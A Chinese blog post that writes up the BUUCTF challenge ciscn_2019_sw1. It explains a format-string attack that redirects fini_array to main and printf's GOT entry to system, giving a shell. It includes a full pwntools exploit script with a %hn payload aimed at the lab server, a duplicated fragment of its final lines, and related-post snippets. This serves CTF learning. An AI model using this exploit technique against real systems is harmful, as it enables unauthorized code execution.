Ciscn_2019_sw1<fini_array>

已于 2023-09-22 15:40:04 修改
阅读量139 收藏
点赞数
文章标签: 服务器 数据库 运维
于 2023-09-22 15:39:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55906008/article/details/133173429
版权

Ciscn_2019_sw1

​ 在执行main函数之前会调用init_array里的函数,在执行完main函数之后调用fini_array里的函数,因此这道题思路为通过第一次printf劫持printf的got表为system的函数地址,劫持fini_addr为main函数的地址,第二次输入"/bin/sh\x00",当执行到printf(“/bin/sh\x00”)时,由于劫持为system函数,因此执行system(“/bin/sh\x00”),拿到shell。

在这里插入图片描述

话不多说,给exp

from pwn import *
from LibcSearcher import *

file_path = "./chall/1"
local = 0
remote_path = "node4.buuoj.cn:28410"
elf = ELF("./chall/1")
# libc = ELF("/usr/lib/x86_64-linux-gnu/libc.so.6")


################################  forbidden ####################################
if local != 1:
    p = remote(remote_path.split(":")[0],int(remote_path.split(":")[1]))
else:
    p = process(file_path)

sd      = lambda payload        : p.send(payload)
sdl     = lambda payload        : p.sendline(payload)
sda     = lambda data,payload   : p.sendafter(data,payload)
sdla    = lambda data,payload   : p.sendlineafter(data,payload)
it      = lambda                : p.interactive()
rcv     = lambda num            : p.recv(num)
rcv_all = lambda                : p.recv()
rcvu    = lambda data           : p.recvuntil(data)
lbc     = lambda str1,str2      : LibcSearcher(str1,str2)
lg      = lambda name,data      : p.success(name + "-> 0x%x" % data)



#采用b *<addr>  b *$rebase(<addr>)下断点
def debug(a=''):
    if local:
        gdb.attach(p,a)
        if a=='':
            pass
    else: pass
################################  forbidden ####################################

get_addr_64 = lambda: u64(rcvu(b"\x7f")[-6:].ljust(8,b"\x00"))


############################################################################
##check: arch
##check:local
##check: .so
if __name__ == "__main__":

    context(os='linux', arch='amd64', log_level='debug')
    debug("b *0x80485a8")
    sys_addr = 0x80483d0
    fini_addr = 0x804979c
    printf_got = 0x804989c
    main_addr = 0x8048534
    #更改fini_addr处为main函数地址,劫持printf got表为system函数
    payload = "%{}c%{}$hn%{}c%{}$hn%{}c%{}$hn".format(0x804,14,0x83d0-0x804,15,0x8534-0x83d0,13) 
    payload = bytes(payload.encode("utf-8"))
    payload = payload + p32(fini_addr) + p32(printf_got+2) + p32(printf_got)
    rcv_all()
    payload = payload.ljust(32,b"a")
    sdl(payload)
    sleep(0.2)
    sdl(b"/bin/sh\x00")
    it()

l(payload)
sleep(0.2)
sdl(b"/bin/sh\x00")
it()
魔瞳。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
rmw_cyclonedds:Eclipse Cyclone DDS的ROS 2 RMW层
04-02
Eclipse Cyclone DDS的ROS 2 RMW 用于ROS 2的简单,快速,可靠的小型中间件。 :turtle: 像一个 :rocket: 在ROS社区中和贡献者,并且是和 (自动驾驶)的开源项目。 该软件包使使用作为底层DDS实现。 Cyclone DDS可以使用了。 它旨在提供最快,最简单和最可靠的ROS 2体验。 让旋风把你吹走! 安装: apt install ros-eloquent-rmw-cyclonedds-cpp 或者 apt install ros-dashing-rmw-cyclonedds-cpp 设置环境变量并像往常一样运行ROS 2应用程序: export RMW_IMPLEMENTATION=rmw_cyclonedds_cpp 确认RMW:在Eloquent和以后的版本中,确认您正在使用哪个RMW: ros2 doctor --report 绩效建议 对于大
BUUCTF之“ciscn_2019_sw_1”
Probeginner的博客
12-26 637
通过fmt改fini_array为main,更加深入理解程序执行
[BUUCTF-pwn]——ciscn_2019_sw_1
Y_peak的博客
04-03 448
[BUUCTF-pwn]——ciscn_2019_sw_1 一个简单的格式化字符串, 相信大家看到旁边 的system和格式化字符串漏洞,想的一定是利用格式化字符串漏洞将printf_got表修改system_plt表,然后使其循环调用main第二次输入’/bin/sh’就好 可能唯一需要说一下的就是, 程序结束时会调用_fini_array指向的函数指针,所以我们将其修改为mian就会循环调用了 算下偏移, 一看就是4 exploit from pwn import * p = remote("no
ciscn_2019_sw_1(fmt改fini_array无限循环)
wuyvle的博客
04-30 1413
很明显的格式化漏洞,但是printf只能用一次 我们可以修改fini_array 简单地说,在main函数前会调用.init段代码和.init_array段的函数数组中每一个函数指针。同样的,main函数结束后也会调用.fini段代码和.fini._arrary段的函数数组中的每一个函数指针。 而我们的目标就是修改.fini_array数组的第一个元素为start或者main函数地址。需要注意的是,这个数组的内容在再次从start开始执行后又会被修改,且程序可读取的字节数有限,因此需要一次性修改两个地址并且
ciscn_2019_sw_1
z1r0的博客
02-21 720
ciscn_2019_sw_1 查看保护 这里有一个格式化漏洞,但是呢这里只能一次。这里学到了一个新姿势在程序结束的时候有一个fini.array段运行。这时将 fini.array[0]的地址改为main函数地址这样就可以运行两次了。这样的话改printf为system之后第二次传入bin/sh即可getshell。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0'
ciscn_2019_sw_1 Writeup
Calllin的博客
05-11 467
前提 RELRO防御策略是当RELRO保护: 为NO RELRO的时候,init.array、fini.array、got.plt均可读可写 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写 为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。 linux程序运行时: 在加载的时候,会依次调用init.array数组中的每一个函数指针 在结束的时候,依次调用fini.array中的每一个函数
ciscn_2019_sw_1(fmt劫持fini_array为main,获得一次循环)
m0_51251108的博客
11-13 544
ciscn_2019_sw_1: 主要参考这位师傅:https://www.cnblogs.com/LynneHuan/p/14660529.html#%E7%9F%A5%E8%AF%86%E7%82%B9 先引用下: 当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写; 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写; 为FULL RELRO时,init.array
格式化字符串+fini_array劫持
qq_51474381的博客
04-27 656
新知识点 fini_array劫持:幽默的大师傅的boke 题目是上的ciscn_2019_sw_1 一次格式化字符串很明显。 利用思路 1.格式化字符串劫持fini_array,实现格式化字符串无限循环。 2.改printf_got为system_got,输入/bin/sh. exp: from pwn import * from LibcSearcher import * context.log_level='debug' context.arch='amd64' #p=proc
[BUUCTF-pwn]——picoctf_2018_echo back
Y_peak的博客
04-03 388
[BUUCTF-pwn]——picoctf_2018_echo back 和之前的一道题及其类似大家可以对比一下[BUUCTF-pwn]——ciscn_2019_sw_1 思路都是一样的就是将printf_got修改为system_plt表,然后循环调用就好 找偏移, 为7 不过有点难受的是, 不知道为什么利用fini_array不行,那里错了也不知道,没办法只有利用put的got表了。 exploit from pwn import* p=remote('node3.buuoj.cn',27945)
featool-multiphysics-setup.zip_FEAtool下载_featool_featool 下载_fini
07-14
matlab有限元分析工具箱,包含gui界面
bttv-input.rar_V2
09-23
bttv input fini for Linux v2.13.6.
projet_nsi_2
02-22
Le projet n'est pas encore fini,公平的日子: 消息报 临时行政管理人员 再加上行政管理人员的文凭,以及非官方授课的信息(可能的情况是,来自澳大利亚,法国,法国,法国,法国,法国,法国,法国,法国,法国...
BookingApp_ASP.NET
04-17
功能性完毕主页: 研究提供查看最近的报价登录和注册: 外部... Assurez-vous que le projet approprié est défini en tant que projet de démarrage...Juste关闭解决方案(项目),然后通过BookingApp.sln重新打开
linux 格式化字符串漏洞
sky123博客
02-04 2035
格式化字符串漏洞 格式化字符串介绍 常见格式化字符串函数 函数 基本介绍 printf 输出到stdout fprintf 输出到指定FILE流 vprintf 根据参数列表格式化输出到stdout vfprintf 根据参数列表格式化输出到FILE流 sprintf 输出到字符串 snprintf 输出指定字节数到字符串 vsprintf 根据参数列表格式化输出到字符串 vsnprintf 根据参数列表格式化输出指定字节到字符串 常用格式化字符串形式 %[p
webserver服务器从零搭建到上线(八)|EpollPoller事件分发器类
糖炒栗子
05-28 871
EPollPoller 类实现了基于 epoll 的 I/O 多路复用,通过监控多个文件描述符上的事件,并在事件发生时通知相应的 Channel 对象来处理事件。通过实现这些函数,EPollPoller 能够高效地管理和分发事件。下一节,我们将讲解EventLoop类的具体实现!
华纳云:在一个服务器上如何设置多个IP地址?
YOKEhn的博客
05-27 356
在Windows上,可以通过网络连接的高级TCP/IP设置或使用netsh命令添加多个IP地址。在一个服务器上设置多个IP地址的具体步骤取决于所使用的操作系统(例如Linux或Windows)。你也可以使用ip命令临时配置多个IP地址,这在需要立即生效但不重启网络服务的情况下非常有用。在“IP 设置”标签下,点击“添加”按钮,输入新的IP地址和子网掩码,然后点击“添加”。选择“Internet 协议版本 4 (TCP/IPv4)”,然后点击“属性”。右键点击要配置的网络适配器,选择“属性”。
TPM之VMK密封
柳似烟的专栏
05-27 400
同样的,具备TPM芯片的电脑,在系统中存在一个\Device\TPM的设备以及对应的TPM驱动程序,所以,当对系统进行基于TPM芯片的Bitlocker加密时,存在DeviceIOControl的交互,下面通过抓包来窥探这一过程。同样,基于TPM的安全启动链也不做过多解释,简单说就是当电脑通过TPM进行全盘加密后,后期对电脑的改动影响系统启动,PCR校验不通过时,触发输入恢复密钥的“蓝屏”。通过分析保存的json格式的文件,追踪文件句柄,得到TPM加密时的所有与驱动层的交互数据。PCR校验位图解释如下。
sh发送邮件如何通过配置SMTP服务器来实现?
最新发布
qianke369的博客
05-30 506
通过配置SMTP服务器,可以实现在Shell脚本中发送邮件的功能。AokSend,API/SMTP接口秒发邮件,sh脚本一键操作,轻松实现高效营销,让您的业务更上层楼!
undefined reference to `__libc_csu_fini'
07-28
引用\[1\]中的错误信息"undefined reference to `__libc_csu_fini'"是一个编译错误,它表示在链接过程中找不到对应的函数定义。这个错误通常发生在使用了某个函数,但没有正确链接对应的库文件时。在这种情况下,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值